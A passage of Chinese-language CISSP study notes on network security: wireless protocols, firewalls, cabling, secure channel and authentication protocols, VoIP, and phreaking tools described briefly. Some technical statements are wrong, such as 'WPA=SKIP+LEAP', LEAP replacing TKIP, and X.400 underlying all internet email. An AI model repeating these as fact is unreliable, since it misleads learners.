802.1X/EAP,被称为企业认证,就是一个标准的基于端口的网络访问控制协议,确保客户 端在没有发生正确认证时不能和资源发生通信。 WEP、WPA 和 WPA2 都支持 802.1X/EAP。 ⑤PEAP 受保护的可扩展认证协议 Protected Extensible Authentication Protocol EAP 最初被设计用在相互物理隔离通道,是不加密的。于是 PEAP 用来为 EAP 提供加密, 它利用 TLS 隧道封装 EAP。 ⑥LEAP 轻量级可扩展认证协议 Lightweight Extensible Authentication Protocol LEAP 是 Cisco 专有的认证协议,用于 WPA,可替代 TKIP。它并不安全,2000 年就破解了。 ⑦MAC 过滤器 MAC Filter MAC 过滤可以防止蹭网,不过大规模无线局域网管起来有点麻烦,主机太多了,而且 MAC 很容易被伪造。 ⑧TKIP 临时密钥完整性协议 Temporal Key Integrity Protocol TKIP 用于 WPA,可替代 WEP,且不需要更换无线硬件,它在使用 RC4 算法密钥进行加密之 前结合了初始向量(IV)与安全的根密钥;一个序列计数器被用来防止报文重放攻击;同时还使 用 Michael 进行完整性检查。TKIP 后来又被 CCMP 替代了。 ⑨CCMP 密码块链消息认证码协议计数器模式 Counter Mode with Cipher Block Chaining Message Authentication Code Protocol CCMP 用于取代 WEP 和 TKIP/WPA,它使用 AES (高级加密标准)和一个 128 位的密钥。 总体过程:WEP WPA=SKIP+LEAP WPA2=CCMP, 4.天线 Antenna 天线要设置在合适的位置,哪个位置好自己看风水。天线有很多种,要知道它们的名字。 5.蓝牙 IEEE 802.15 蓝牙更趋向于本地使用,其目的是“更换连接设备的电缆”,其最大范围为 100 米(330 英尺),使用 2.4GHz 频率,主要用于工业环境,使用 4 位 PIN 码来配对。范围取决于该设备的 使用功率等级。在蓝牙网络中,通常使用 2 级,范围可达 10 米(33 英尺),这个速度足够传送 高保真音乐传输和视频流。针对或利用蓝牙的攻击有 2 种。 ①Bluesnarfing:目的是窃密。targets the data on luetooth-enabled devices. ②Bluejacking:目的是广告。send unsolicited messages via Bluetooth. 6.全球微波互联接入 无线宽带的一个著名的例子是 WiMAX。通过 WiMAX 技术,可以提供超过 30 兆位/秒的数据 —120— 速率,但供应商提供 6Mbps 或更少的平均数据速率,这使服务速率比有线宽带明显减慢。 7.无线基础知识 前面讲了很多无线网络的内容,现在回过头来讲讲无线通信。频谱资源是有限的,900M, 2.4G,5GHz 的频率是公开的,很多设备都用这几个频段。怎么避免频率冲突和干扰呢?必须 使用频率复用的技术。 ①扩频 Spread spectrum。指的是通信可以通过多个频率同时发生。因此,一条报文可以 被分为若干片段,所有片段同时进行发送,不过每个片段都使用不同的频率。实际上,这是一 种并行通信,而不是串行通信。 ②跳频扩频(FHSS)。是扩频概念的早期实现。然而,这种技术并非以并行方式发送数据, 而是串行传输数据,同时不断改变所使用的频率。可用频率的整个范围都会被使用,但是每次 只使用一个频率。发送者改变频率时,为了接收到信号,接收者必须遵循相同的跳频模式。FHSS 被设计用于帮助最小化干扰,而不是只使用会受到影响的单一顿率。在实际使用中,通过不断 切换频率,干扰就被最小化。 ③直接序列扩频(DSSS)。以并行方式同时利用所有可用频率。与 FHSS 相比,DSSS 提供 了更高的数据吞吐率。DSSS 也使用被称为碎片码的特殊编码机制来允许接收方重构数据,即 使是部分信号由于干扰被破坏也同样适用。这种情况与 RAID-5 的奇偶位允许重新创建所丢失 驱动器上数据几乎完全相同。 ④正交频分复用(OFDM)。仍然是另一种频率使用的变化形式。OFDM 利用了允许传输进行 更紧密压缩的数字多载波调制模式。已调制信号是正交的,因此不会导致相互干扰。最后,OFDM 需要的频率组(也就是信道频宽)更小,却能够提供更大的数据吞吐率。 蜂窝电话从 1G 发展到 4G,大家应该都比较清楚了,不详说。 1G:NMT、AMPS、TACS; 2G:GSM、iDEN、TDMA、CDMAPDC; 2.5G:HSCSD、GPRS; 3G:W-CDMA、TD-CDMA、UWC、EDGE、DECT、UMTS; 4G:WiMax–IEEE 802.16、XOHM (Brand name of WiMax)、Mobile Broadband – IEEE 802.20、 LTE (Long Term Evolution) A.7 用于维护通信安全的密码学 密码学看第三域,I 章节。 1.如何使用证书 安全专家需要确保他们熟悉最常用的五种产品证书(都是 PKI 提供的证书): ①客户端 SSL 证书。用来确定客户端与服务器端的 SSL(客户端身份验证)。例子:一个银 行给顾客一个客户端的 SSL 证书,允许银行的服务器来识别客户和授权访问客户的账户。 ②服务器端 SSL 证书。用来识别服务器到客户端的 SSL(服务器身份验证)。服务器可以使 用或不使用客户端认证。在使用加密的 SSL 会话时候,服务器端认证是一个基本要求。例如: 从事电子商务的互联网网站,通常支持基于服务器身份验证证书,至少,要建立一个加密的 SSL 会话,基于此向消费者保证,与他们所交易的网站是一个经过认证的特定公司站点。加密 —121— 的 SSL 会话可以保证,在网络传送的个人信息(如,信用卡号码)不被轻易的截获。 ③S/MIME 证书。用于签名和加密的电子邮件(使用 PKI)。与客户端的 SSL 证书,客户端 的身份通常被认为是作为一个人类的身份,如一个企业的员工。一个单一的证书可以作为双方 的 S/MIME 证书和 SSL 证书。S/MIME 证书也可用于表单签名,和一个单点登录解决方案的一部 分。例子:一个公司部署结合 S/MIME 和 SSL 证书仅用于验证员工身份的目的,从而允许签名 的电子邮件客户端 SSL 认证,但不加密的电子邮件。另一家公司使用 S/MIME 证书用于双方签 名和加密电子邮件,起到处理敏感的财务或法律事务处理的目的。 ④对象签名证书。用于识别程序代码签名者,签名脚本,或其他的签名文件。例如:一个 软件公司对一个发布在互联网上的软件进行签名,为用户提供了软件公司合法产品的保证。以 这种方式使用证书和数字签名,也可以让用户识别和控制下载合法软件倒自己的电脑上。 ⑤证书颁发机构/权威认证机构(CA)证书,用于识别 CAs。客户端和服务器软件使用 CA 证 书来确定什么样的其他证书是可信的。例如:CA 证书存储在一个程序或应用程序中,确定哪 些证书是可以验证程序的副本。管理员可以通过控制每个用户 CA 证书副本存储在应用程序, 来实现公司安全政策的某些形势。 2.证书和轻量级目录访问协议(LDAP)目录 在一个组织中,使用 LDAP 访问目录服务支持极大灵活性的证书管理。在 LDAP 兼容的目录 管理中,系统管理员可以存储多种需要的证书信息。LCAP 就是存储、管理、分发证书的东西。 B.保护网络组件安全 这里讲主要的网络安防手段和措施。 了解下 2 种欺骗: ①非盲欺骗(不与主机通信) 这种类型的攻击发生时,攻击者和受害者在相同的子网内,攻击者只监测数据,而不拦截 数据。在这种情况下,欺骗的最大威胁是会话劫持。这是通过欺骗一个建立连接的数据流来完 成的,之后,攻击者重新建立基于正确的顺序号和确认号的通信。 ②盲欺骗(与主机进行通信) 这是一个更复杂的攻击。几个数据包被发送到目标主机,为了获取序列号样本并最终检测 正确顺序。如果序列号被地露,数据可以被发送到目标主机。 B.1 硬件操作(例如:调制解调器、交换机、路由器、无线接入点、移动设备) 这里介绍各种网络设备,都是常用的,不难。不过要熟悉通信和交换的原理。 1.冲突与广播 Collisions vs. Broadcasts ①当两个系统同时在 1 个通信信道或传输介质上传送数据时,就会发生冲突。 ②当单个系统向所有可能的接收者发送数据时,就会发生广播。 冲突避免技术是各种网络设备必须要采用的,即如何管理冲突域和广播域。使用任何第二 层或更高层设备可以分割冲突域,使用任何或更高层设备则可以分割广播域。域被分割时,就 意味着部署在设备另一侧上的系统是不同域的成员。 ①中继器、集中器和放大器 Repeaters, Concentrators, and Amplifiers(一层) —122— 工作在 OSI 模型的第一层,设备两侧的系统都位于相同的冲突域和广播域内。 *集中器连接多个连接设备,在网络上一个信号传送。例如,一个光纤分布式数据接口(FDDI) 集中器将传输连接设备到 FDDI 环。 ②集线器 Hubs(一层) 集线器用于连接使用相同协议的网段,它们将入站通信在所有出站端口上进行中继,也就 是一种多端口的中继器。在 OSI 模型的第一层上工作。集线器两侧的系统都位于同一冲突域 和广播域内。集线器是一种过时的技术,交换机已替代它们。 *集线器传输每个端口信号到其它所有端口,实现了一个物理星形拓扑结构,有很多缺点。 ③调制解调器 Modems 在模拟信号和数据信息之间进行调制,从而在公共电话网络(PSTN)等模拟线路上进行数据 通信。最早的 56K 模拟猫已经被 ISDN、DSL 调制解调器,电缆调制解调器、802.11 无线以及 各种形式无线调制解调器的数字宽带技术所替代。其实被称为调制解调(电缆、DSL、ISDN、无 线等)的现代设备是路由器而不是纯粹的调制解调器。 ④桥 Bridges(二层) 桥将两个异构的网络(拓扑结构、线缆类型和速度不同的网络)连接在一起,以便连接使用 相同协议的网段。桥将通信从一个网络转发至另一个网络。将使用不同传输速率的网络连接在 一起的桥可以缓存数据包,直至这些数据包被转发至较慢的网络,这称为存储转发设备。桥在 OSI 模型的第二层上工作,基于 MAC 地址。桥两侧的系统位于相同的广播域内,不过所在的冲 突域不同。 ⑤交换机 Switches(二层) 交换机知道每个出站端口上所连接系统的地址,能够更有效地流量传递、建立隔离的冲突 域以及提高数据的总体吞吐量。在用于创建 VLAN 时,交换机也可以创建隔离的广播域。交换 机主要在 OSI 模型的第二层上工作,用于连接使用相同协议的网段,两侧的系统位于同一广 播域内,不过冲突域不同。一个交换机的每端口都是一个冲突域,使用 CSMA/CD 逻辑传输机制, 能够更有效率的在以太网络中传输。 如果是三层交换机,原理等同于路由器,两侧的系统位于不同的广播域和冲突域内。 ⑥路由器 Routers 路由器用于控制网络上的通信流,在 OSI 模型的第三层上工作,用于连接使用相同协议 的网段,两侧的系统属于不同的广播域和冲突域。动态的路由协议有:RIP、OSPF 和 BGP。还 有一种叫做桥式路由器(Brouters)的东西,我没见过。如果路由失败,那么就默认进行桥接。 ⑦网关 Gateways 网关能够连接使用不同网络协议的网络。通过将通信的格式转换为与每个网络采用的协议 或传输方法都兼容的形式,网关就可以负责从一个网络向另一个网络传输通信信息。网关也称 为协议转换器,既可以作为独立硬件设备,也可以作为一种软件服务(例如 IP-to-IPX 网关) 。 网关两侧的系统位于不同的广播域和冲突域内。网关具有很多类型,包括数据、邮件、应用、 安全和互联网。网关通常在 OSl 模型的第七层上工作。 B.2 传输介质(例如:有线、无线、光纤) —123— 1.同轴电缆 Coaxial Cable 同轴电缆的设计使其能够完全抵抗电磁干扰(EMI) electromagnetic interference,能够 支持高带宽(对比同时代的其他技术),并且提供比双绞线更长的可用长度。由于双绞线更加低 廉的成本且安装简便,它最终失去了其主导地位。同轴电缆的两端(末端)需要使用网段终结 器(50 欧姆电阻器)(2000 年以前读大学的,宿舍局域网都用过同轴网卡)。 ①细缆/细同轴,也被称为 10Base2,通常用来将系统连接到粗缆主干线路。细缆可以扩 展到 185 米的距离,并且能够提供高达 10Mbps 的吞吐率。 ②粗缆/粗同轴,也被称为 10Base5,可以扩展到 500 米的距离,能够提供高达 10Mbps 的 吞吐率。 2.基带和宽带线缆 Baseband and Broadband Cables 10Base2 线路中的 Base,就是表示线路的基带或宽带特性;10 代表速率,2 代表距离。基 带线缆一次只能够传输一个单独的信号,宽带线缆则可以同时传输多个信号。绝大多数网络连 线都采用基带线缆。然而,在特定的配置中使用时,同轴电缆可以被用作宽带连接,例如线缆 调制解调器。 3.双绞线 Twisted-Pair 有屏蔽层的双绞线被称为屏蔽双绞线(CTP)shielded twisted-pair,反正为非屏蔽双绞 线(UTP)。线缆的缠绕可以使线缆免受外部的无线电频率、电子和磁性干扰,并且降低了线 对之间的串扰。缠绕得越紧(每英寸进行的缠绕越多),那么对内部和外部干扰以及串扰的屏蔽 也就越强,因此吞吐的能力也就越大(也就是说具有更大的带宽)。长度不超 100 米。 各类双绞线的速度也要搞清楚,懒得列出来了。(七类万兆,超五、六类是千兆) 4.铜导线 Conductors 铜导线存在电阻,这使得信号的强度和质量在超出线缆的长度时会降低。信号的这种降低 被称为衰减attenuation。阻燃线缆是一种用燃烧时不会释放毒烟的特殊材料包围的线缆连接, 就像传统的 PVC 覆盖布线。 5.光纤 单模:该模式具有小直径芯,减少电缆内光反射的次数。这可以有更大的传输距离,达到 80 公里,是多模光纤的 50 倍还多。 多模:这种模式使用比单模有更大直径的电缆。随后,增加光的反射。通常用于短距离。 传输距离可达 400 米。 塑料光纤(POF):采用塑料芯和允许较大直径的纤维芯。信号失真是由于塑性大大增加, 这明显的限制了它的范围。传输距离约 100m。 B.3 网络访问控制设备(例如:防火墙、代理服务器) 1.防火墙 Firewalls 防火墙被用于阻止或过滤通信,可以基于内容、应用、协议、端口或源地址来阻止已知的 恶意数据、消息或数据包,能够对公共网络隐藏专用网络的结构和寻址方案,并提供日志记录、 审计和监控性能以及警报和基本的入侵检测系统(IDS)功能。TCP_Wrapper 软件包是一种基 于 TCP/IP 协议之上的、运行于 UNIX/Linux 系统、基于访问控制技术的一种网络防火墙软件。 —124— 防火墙分类是很基础的知识,必考: ①静态的数据包过滤防火墙 Static Packet-Filtering Firewalls(第一代)(第三层) 检查 IP 报文头部的数据进行通信的过滤。过滤规则基于于源地址、目的地址和端口地址。 静态过滤防火墙不提供身份验证,不区分数据包来源,来自专用网络内部还是外部。这种防火 墙也被称为屏蔽路由器或常用路由器。 ②应用级网关(代理)防火墙 Application-Level Gateway Firewalls(第二代)(第七层) 应用级网关防火墙也称为代理防火墙,基于用于传送或接收数据的网络服务(也就是应用) 来过滤通信。每种应用类型都必须具有其自己的唯一代理服务器。因此,应用级网关防火墙包 括很多独立的代理服务器。由于每个信息数据包在通过防火墙时都必须经过检查和处理,因此 这种类型的防火墙性能不高。应用级网关在 OSI 模型的应用层(第七层)上工作。 ③电路级网关(代理)防火墙 Circuit-Level Gateway Firewalls(第二代)(第五层) 电路级网关防火墙也称为电路代理,用于在可信合作伙伴之间建立通信会话,它在 OSI 模 型的会话层(第五层)上工作。SOCKS (来自安全套接字,就像 TCP/IP 端口一样)是电路级网关 防火墙的通用实现。相当于信道加密。这种防火墙只基于通信电路的终点名称(也就是源地址、 目的地址以及服务端口号)来许可或拒绝转发决策。它仍被视为第二代防火墙。 ④状态检测防火墙 Stateful Inspection Firewalls(第三代)(第四层) 状态检测防火墙也被成为动态包过滤防火墙,要对网络通信的状态或环境进行评估。通过 查看源和目的地地址、应用习惯、起源地以及当前数据包与同一会话先前数据包之间的关系, 状态检测防火墙就能够为己授权的用户和活动授予广泛的访问权限,并且能够积极地监视和阻 止未授权的用户和活动。状态检测防火墙通常比应用级网关防火墙更为有效。状态检测防火墙 被视为第三代防火墙,并且在 OSI 模型的网络层和传输层(第三、四层)上工作,即网络层过滤, 会话层和应用层检查。 2.多宿主防火墙 Multihomed Firewalls 防火墙一般都具有多个接口(具有两个接口的防火墙被称为双宿主防火墙)。其实要 1 对接 口才能串接进网络,2 对接口可以管控 2 个子网。不过,这 2 个子网必须隔离,不能在防火墙 内实现数据交换。 堡垒主机/屏蔽主机 bastion host /screened host 位于专用网络和不可信网络之间的防火墙系统(边界设备),通常位于外联路由器之后。 堡垒主机不仅负责过滤进入专用网络的通信,而且还负责保护内部客户端的身份。术语"堡垒" 来源于中世纪的城堡建筑风格,其中堡垒警戒室位于主入口前面,也就是现在的门户岗亭。 利用堡垒主机(Bastion Host)和一台包过滤路由器构建,堡垒主机处于内网中提供代理服 务,包过滤路由器除提供过滤功能外,还被配置为只允许堡垒主机进行外部访问,所以内部主 机只能通过堡垒主机代理访问外部网络,安全性较高。 屏蔽子网 screened subnet 屏蔽子网与屏蔽主机(也就是堡垒主机)在概念上相似,是指包含堡垒主机的,位于外网、 内网两个路由器之间,1 个子网。是内部系统外联的一个代理区。 DMZ 就是屏蔽子网,是个网络隔离区(停火区/非军事区)。能够访问外网、内网,与外网、 —125— 内网间都有隔离手段。DMZ 常常是公共 Web、电子邮件、文件以及其他资源服务器的宿主。 3.防火墙的部署 ①单层部署。只提供最低限度的保护,很简单。 ②双层部署。使用多个防火墙,分别联外网、内网,形成一个 DMZ。中等安全。 ③三层部署。在 DMZ 以内,再部署防火墙,区分不同等级的事务处理子网。太复杂了。 4.防火墙策略类型 ①静默规则(要少日志):不记录任何被过滤流量的日志,减少系统日志大小。 Silent rule,Drops “noisy” traffic without logging it. This reduces log sizes by not responding to packets that are deemed unimportant. ②安全规则(要严登陆):严格限定登陆和配置防火墙的终端设备,禁止未授权访问。 Stealth rule,Disallows access to firewall software from unauthorized systems. ③消除规则(最后一条):配置在防火墙规则库(策略库)的最后一条,过滤所有不符合 前述规则的流量,并记录相关日志。 Cleanup rule,The last rule in the rule base, which drops and logs any traffic that does not meet the preceding rules. ④限制规则(精细配置):不能使用“ANY”等任意的、宽泛的策略,必须精细配置每一 条通信需要开放的 IP、服务和端口,实现通信完全受控。 Negate rule,Used instead of the broad and permissive “any rules.” Negate rules provide tighter permission rights by specifying what system can be accessed and how. 5.网络地址转换(NAT) 防火墙可以改变每个外出流量的源地址(从可信不可信网络)到不同的地址。一个不可路由 的地址(私网地址)是不会被互联网路由器转发的,因此,如果远程攻击使用不可路由的内部 地址,是不能在开放的互联网上路由的。匿名是另一个使用 NAT 的理由。NAT 也极大地扩展了 组织的 IP 地址空间能力,使 IPv4 地址可以继续使用。详细的 NAT 在 C.5 章节里讲。 6.端口地址转换(PAT) 以前叫动态 NAT。PAT 是 NAT 的延伸,是将所有内部地址的源端口号的映射到一个可路由 IP 地址的不同端口上去。使用了 PAT 的端口映射技术,将允许防火墙跟踪多个通信会话。 7.入侵检测和防御系统(IDS/IPS) 有两大类: *基于主机的 IDS/IPS,监控服务器和工作站的活动 *基于网络的 IDS/IPS,监控网络活动。 入侵检测的探测有好几种。在第 7 域 H.2 章节详述。 8.安全事件管理(SEM)/安全事件和意外管理(SEIM) SEM/SEIM 是一个解决方案,包括,从各种不同的来源、服务器或资产信息中收集日志和 事件,并分析这个复杂情况,形成综合报告视图。同样,整个 IT 基础设施可以部署集中化的 大范围的 SEM/SEIM 系统,对日志和事件信息进行集中管理。SEM/SEIM 不仅将综合日志将进行 分析,根据既定怀疑模型,发现异常时还会发出警报。 —126— B.4 端点安全(终端安全) 也就是终端安全。每个单独设备必须维护本地安全,不论其网络或通信通道是否提供安全。 有时这被表示为“末端设备应对它自己的安全负责”。每个系统都应该有合适的安全组合,包 含本地主机防火墙、反恶意软件扫描、身份验证、授权、审计和垃圾邮件过滤器以及 IDS/IPS 服务。还要打补丁,裁减服务什么的。等级防护评测最后肯定要检查终端的。 B.5 内容分发网络 内容分发网络 CDN(Content Distribution Networks),或叫内容转发网络,是一个资 源服务的集合,其部署在互联网许多数据中心上以提供低延迟、高性能、高可用性和承载的内 容。其实就是在各地的节点安装一个缓存服务器,提高并发访问效能。如今,CDN 服务是互联 网内容的一个主要服务分支,包括 Web 对象(文本,图形和文字),下载对象(可下载媒体文件, 软件,文档),应用(电子商务,门户网站),流媒体直播,点播流媒体,社会网络。 B.6 物理设备 详见 B.1 章节。 C.设计与建立安全通信信道 为特定应用通信信道提供安全服务协议被称为安全通信协议。先列一些主流的安全通信协 议,重要的在后面再详细介绍: 1.用于安全通信的(必考) ①IP 简单密钥管理(SKIP) Simple Key Management for Internet Protocol 这是一种用于保护无会话数据报协议的加密工具(无线 WAP 用了)。SKIP 被设计为与 IPSec 相结合,并且在 OSI 模型的第三层上工作。SKIP 能够对 TCP/IP 协议族的任何子协议进行加密。 SKIP 在 1998 年被互联网密钥交换(IKE)替代。 ②软件 IP 加密(swIPe) Software IP Encryption 这是另一种第三层 IP 安全协议。它通过使用封装协议来提供身份验证、完整性和机密性。 ③安全远程过程调用(S-RPC) Secure Remote Procedure Call 这是一种身份验证服务,只是防止在远程系统上在未经授权的情况下执行代码的手段。 ④安全套接层(SSL) Secure Sockets Layer 这是一种由 Netscape 开发的加密协议,目的是保护 Web 服务器和 Web 浏览器之间的通信。 SSL 可以被用于保护 Web、电子邮件、FTP 甚至 Telnet 通信的安全。SSL 是一个面向会话的协 议,使用对称密钥来加密数据,使用非对称密钥来进行对等认证(Peer Authentication), 它提供了机密性和完整性。SSL 使用 40 位密钥或 128 位密钥进行部署。CISSP 认为 SSL 位于传 输层(网络层之上,应用层之下),实际上它由两个协议组成:一个工作在会话层的底部,另 一个工作在传输层的顶部。在 SSL 上运行的 HTTP 就是 HTTPS(HTTP Secure)。 POODLE 漏洞(Padding Oracle On Downloaded Legacy Encryption vulnerability),可 被攻击者用来窃取采用 SSL3.0 版加密通信过程中的内容,又被称为“贵宾犬攻击”。虽然该 攻击利用有一定的难度,需要完全控制网络流量,但在公共 wifi 遍地都是和强调国家之间对 抗的 APT 背景下,该漏洞仍有不小的影响。它迫使用户放弃 SSL,选用 TLS。 —127— ⑤传输层安全(TLS) Transport Layer Security TLS 的功能类似于 SSL,相当于 SSL3.1 版本,但是它使用更健壮的认证和加密协议。 SSL 和 TLS 都有以下功能特性: *支持在不安全的网络中提供安全的客户-服务器方式通信,并防止篡改、欺骗和窃听。 *支持单向认证。 *使用数字证书支持双向认证。 *通常实现为一个 TCP 包的初始载荷,允许它封装所有的更高层协议的有效载荷。 *可以应用在低层,如在第三层(网络层)作为一个 VPN。这被称为 OpenVPN。 此外,TLS 能用于加密 UDP 和会话初始协议(SIP)连接。SIP 是一个和 VoIP 有关联的协议。 ⑤安全电子交易(SET) Secure Electronic Transaction 这是一种在互联网上进行交易传输时所使用的安全协议。SET 的基础是 RSA 加密以及数据 加密标准(DES)。主要的信用卡公司都支持 SET,例如 Visa 和 MasterCard 。然而,SET 没有 被互联网广泛接受:相反,SSL/TLS 加密的会话是安全电子商务的首选机制。 ⑥安全外壳 SSH (Secure Shell) 安全外壳(SSH)在功能上类似于一种隧道机制,它为远程计算机提供终端式访问。SSH 是 一种能够用于通过网络访问另一台计算机的程序。SSH 在易受攻击的通道(如 Intemet)上提供 身份验证和安全传输。两台计算机会进行握手,并且(通过 Diffie-Hellman)交换会话密钥, 这个会话密钥将在会话过程中加密和保护传送的数据。SSH 应当取代 Telnet、FTP、rlogin、 rexec 或 rsh 使用,它们提供的功能与 SSH 的功能是一样的,但是安全程度要低得多。 ⑦IPSec/Intemet 协议安全(Intemet Protocol Security, IPSec) 必考,详见第四域 C.3 章节。 2.用于身份验证的(必考) ①密码身份验证协议(PAP) Password Authentication Protocol 这是一种用于 PPP 的标准身份验证协议。PAP 以明文的形式传递用户名和密码,不提供任 何形式的加密;只是简单地提供了一种从客户端向身份验证服务器传输登录凭证的手段。 ②挑战握手身份验证协议(CHAP) Challenge Handshake Authentication Protocol 这是在 PPP 链接上使用的一种身份验证协议。CHAP 对用户名和密码进行加密。它通过使 用不能重放的“挑战——响应”对话来执行身份验证操作。在建立的通信会话持续期间,CAHP 也会定期对远程系统重新进行身份验证,从而验证远程客户端的持久性身份。这个活动对用户 是透明的。 ③可扩展身份验证协议(EAP) Extensible Authentication Protocol 这是一个身份验证架构/框架,而不是一种实际的协议。EAP 允许自定义身份验证安全解 决方案,例如支持智能卡、令牌和生物测定学。 上述三种身份验证协议最初用在拨号 PPP 连接上。现在,大量的远距离连接技术(包括宽 带和 VPN) 都应用了这些协议与其他很多较新的身份验证协议和概念。 ④EAP,PEAP 和 LEAP 受保护的可扩展认证协议(PEAP)Protected Extensible Authentication Protocol 封装 在一个 TLS 隧道中。PEAP 优于 EAP 是因为 EAP 假设信道已经被保护,但是 PEAP 实施自己的 —128— 安全。PEAP 在802.11 无线连接上用于保障通信安全。PEAP可以采用无线协议接入WPA和WPA-2 连接。PEAP 也优于思科专有的 EAP ,即轻量级的 EAP 协议 Lightweight Extensible Authentication Protocol (LEAP)。LEAP 是思科对不安全 WEP 的一个对策。LEAP 支持频繁的 再认证和 WEP 密钥的变化(WEB 使用单个认证和一个静态密钥)。然而,LEAP 可以被各种工具 和技术进行破解,包括漏洞利用工具 Asleap。 C.1 语音 常规的专用分支交换/专用小型交换机/用户级交换机(PBX) Normal private branch exchange 或普通传统电话服务(POTS)plain old telephone service 或公共交换电话网络 (PSTN) public switched telephone network 的语音通信容易遭受截获、偷听、分机窃听和 其他利用。 1.互联网语音协议(VoIP) VoIP 是一种将语音封装成 IP 数据包并支持音频电话通过 TCP/IP 网络进行连接的技术。 一些 VoIP 系统其本质上是纯明文形式的通信,这将容易被拦截和窃听。 *呼叫 ID 可以轻易的被伪造,从而执行语音钓鱼(VoIP phishing)攻击或在网络中进行语 音垃圾邮件(SPIT)攻击 Spam over Internet Telephony。 *呼叫管理系统和 VoIP 电话本身漏洞可能会受到 DOS 攻击。 *黑客可能会通过欺骗用户进行回拨的方式发动中间人(MitM)攻击。man-in-the-middle *不加密的 VoIP 流量可以通过解码的方式被监听。 电信诈骗什么的社会工程学就不提了。 2.直接拨入系统访问控制 DISA PBX 系统的“安全”一般会用直接拨入系统访问控制(DISA),此系统被设计为通过为用户 指派访问码来帮助管理 PBX 的外部访问和外部控制。 这种系统会遭到飞客(phreaker)的危害和滥用。一旦外部的飞客获悉了 PBX 访问码,他 们往往能够完全控制和滥用公司的电话网络,这包括使用 PBX 将长途呼叫的计费指向公司的电 话账户,而不是指向飞客的电话。飞客行为(phreaking)是一种针对电话系统的特定攻击类型。 飞客使用各种技术回避电话系统,从而获得免费的长途呼叫、更改电话服务的功能、窃取特殊 的服务甚至导致服务中断。下面列出了你需要了解的一些飞客工具(前提是已经搭线): ①黑盒。控制线路电压,只是使用电池和线夹定做的电路板。(加电) ②红盒。模拟硬币存入付费电话时的声音来盗打电话,比如用磁带录音机。(投币) ③蓝盒。模拟与电话网络主干系统直接互动的 2600Hz 声音,可以是哨子、磁带录音机或 数字音频生成器。(发声) ④白盒。用于控制电话系统,它是一种双音多频(DTMF)生成器(就是键盘),维修员有这样 的装备。(控制) 记忆:黑电(黑店)、红币(人民币)、蓝声(男声)、白控。 3.传真的安全 可以通过传真加密器、链路加密、活动日志以及异常报告提高安全性。 —129— C.2 多媒体协作(例如:运程会议技术、即时消息) 视频会议,即时消息 IM,互联网中继聊天 IRC 什么的,它们有三种类型: ①P2P 网络;②代理通讯;③面向服务的网络。它们的安全很重要,重点讲下电子邮件。 电子邮件服务器通过使用简单邮件传输协议(SMTP) Simple Mail Transfer Protocol 接 收来自客户端的消息,向其他服务器传送这些消息,并且将消息存放入用户基于服务器的收件 箱。除了电子邮件服务器之外,这个基础架构还包括电子邮件客户端。客户端通过邮局协议版 本 3 (POP3) Post Offi ce Protocol version 3 或互联网消息访问协议(IMAP) Internet Message Access Protocol 从基于服务器的收件箱中检索电子邮件。互联网兼容的所有电子邮件系统都 依赖于 X.400 标准定位和处理邮件。 Sendmai1 是 UNIX 系统中最常用的 SMTP 服务器,Exchange 是 Microsoft 系统中最常用的 SMTP 服务器,而 GroupWise 则是 Novell 系统中最常用的 SMTP 服务器。 1.安全多用途互联网邮件扩展(S/MIME) Secure Multipurpose Internet Mail Extensions S/MIME 通过公钥加密和数字签名为电子邮件提供了身份验证和隐私保护。通过 X.509 数 字证书能够提供身份验证,隐私则是通过使用公钥密码术标准(PKCS)加密提供的(使用 PKI)。 使用 S/MIME 可以构成两种类型的邮件: ①签名的邮件 signed messages:提供了完整性和对发送者的身份验证。 ②安全封装的邮件 enveloped message:提供了完整性、对发送者的身份验证以及机密性。 MIME 对象安全服务 MIME Object Security Services (MOSS)为邮件提供身份验证、机密 性、完整性和不可否认性。MOSS 利用了 MD2 和 MD5(Message Digest)算法、RSA 公钥以及数 据加密标准(DES),从而提供了身份验证和加密服务。经 MIME 加密的邮件格式后缀名为.P7S。 2.隐私增强邮件(PEM) Privacy Enhanced Mail 隐私增强邮件 PEM 是一种电子邮件加密机制,它使用 RSA、DES 和 X.509 提供了身份验证、 完整性、机密性和不可否认性。 3.域名密钥识别邮件(DKIM) DomainKeys Identified Mail DKIM 是一个重要的手段,通过域名的身份验证来检测邮件发送自哪个组织。 4.可靠加密/良好的隐私(PGP) Pretty Good Privacy 可靠加密/良好的隐私(PGP) 是一个使用多种加密算法对文件和电子邮件进行加密的公私密钥系统。它使用 RSA 来管理密钥,使用国际数据加密算法(IEDA)来加密数据,使用 MD5 来 提供完整性,使用公钥证书来提供身份验证,对消息进行加密签名来实现不可否认性,但是以 后的版本提供了算法选择。PGP 不是标准,而是一个自主开发的产品。它获得互联网草根阶层 广泛的支持。PGP 最初是任何人都可以使用的免费产品,但是随后又被分为两个不同的产品。 PGP 是一种商业产品;而 OpenPGP 是一个正在开发的标准,GnuPG 依从这个标准,并且这个标 准被免费软件基金会独立开发。 PGP 使用自己的数字证书,不使用 PKI 的 CA。也就是说,PGP 是端到端的互相信任,PKI 只信任 CA。PGP 的每个用户都有一个称为密钥环(key ring)的文件,它是从其他用户那里接收 的公钥的集合。密钥环上的每个密钥都有一个参数,该参数表明相应用户的可信程度以及这个 特定密钥的有效性。 —130— C.3 远程访问(例如:VPN、屏幕截取、虚拟应用/桌面、远程办公) 这里讲远程接入的安全。客户端可以采用这样的形式建立远程通信会话: ①使用调制解调器直接拨号登录远程访问服务器。 ②在互联网上通过 VPN 连接至某个网络。 ③通过瘦客户端(thin-client)连接与某个终端服务器系统相连接。 当然,还有卫星什么的接入手段。 1.安全措施 ①传输保护 各种加密,这可能包括 VPN、SSL,TLS、SecureShell (SSH)、IPSec 以及 L2TP。 ②身份验证 可能包括密码验证协议(PAP)、挑战握手验证协议(CHAP)、扩展验证协议(EAP 或者它扩展 的 PEAP 或 LEAP)、远程验证拨号用户服务(RADIUS) 以及终端访问控制器访问控制系统 (TACACS+)。 一个集成的身份验证机制通常使用 802.1x,即 EAP+RADIUS。 2.拨号协议 拨号协议的两个最主要的例子,PPP 和 SLIP。 ①点对点协议(PPP) Point-to-Point Protocol 一种全双工协议,用于在各种非 LAN(局域网)连接上传输 TCP/IP 数据包,这些连接包 括调制解调器、ISDN、VPN 和帧中继等。它通过使用各种协议(例如 CHAP 或 PAP)实现身份验证。 PPP 是替换 SLIP 的协议,并且可以支持任何 LAN 协议,而不是只支持 TCP/IP。 ②网络串行线路协议(SLIP) Serial Line Internet Protocol 这是一种较老的技术,用于支持异步串行连接(例如串行线缆或调制解调器拨号)上的 TCP/IP 通信。SLIP 已很少使用,不过仍然得到很多系统的支持。SLIP 只能够支持 IP 协议, 